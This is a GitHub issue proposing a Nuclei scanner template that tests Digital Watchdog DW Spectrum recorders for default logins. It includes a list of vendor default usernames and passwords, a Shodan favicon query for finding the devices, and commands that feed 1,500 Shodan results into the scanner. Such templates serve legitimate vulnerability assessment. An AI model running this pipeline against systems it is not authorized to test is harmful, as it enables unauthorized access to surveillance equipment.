### ISSUE TITLE
Create digitalwatchdog-default-login.yaml

### ISSUE THREAD

**Issue by omranisecurity** [projectdiscovery/nuclei-templates#9889]
### Template Information:
Digital Watchdog default login credentials were discovered.

Reference: https://digitalwatchdog.happyfox.com/kb/article/686-recorder-and-raid-default-login-list/

### Nuclei Template:

```yaml
id: digitalwatchdog-default-login

info:
  name: Digital Watchdog - Default Login
  author: omranisecurity
  severity: high
  description: |
    Digital Watchdog default login credentials were discovered.
  reference:
    - https://digitalwatchdog.happyfox.com/kb/article/686-recorder-and-raid-default-login-list/
  metadata:
    shodan-query: http.favicon.hash:868509217
    fofa-query: icon_hash="868509217"
    max-request: 1
  tags: digital-watchdog,default-login,dw-Spectrum

http:
  - raw:
    - |
        POST /web/rest/v1/login/sessions HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{user}}","password":"{{pass}}","setCookie":true}

    attack: clusterbomb
    payloads:
      user:
        - admin
        - dwuser
      pass:
        - admin
        - admin1234
        - admin12345
        - Dw5pectrum

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
        condition: and
      - type: word
        part: header
        words:
          - "Set-Cookie: x-runtime-guid="
```
Result:
```bash
shodan download --limit 1500 dw 'http.favicon.hash:868509217'
shodan parse dw.json.gz --fields ip_str,port --separator ":" > ips.txt
cat ips.txt | nuclei -t digitalwatchdog-default-login.yaml 
```

![image](https://github.com/projectdiscovery/nuclei-templates/assets/38619429/9b23db45-ea5f-41e5-8582-c8786701a3e8)
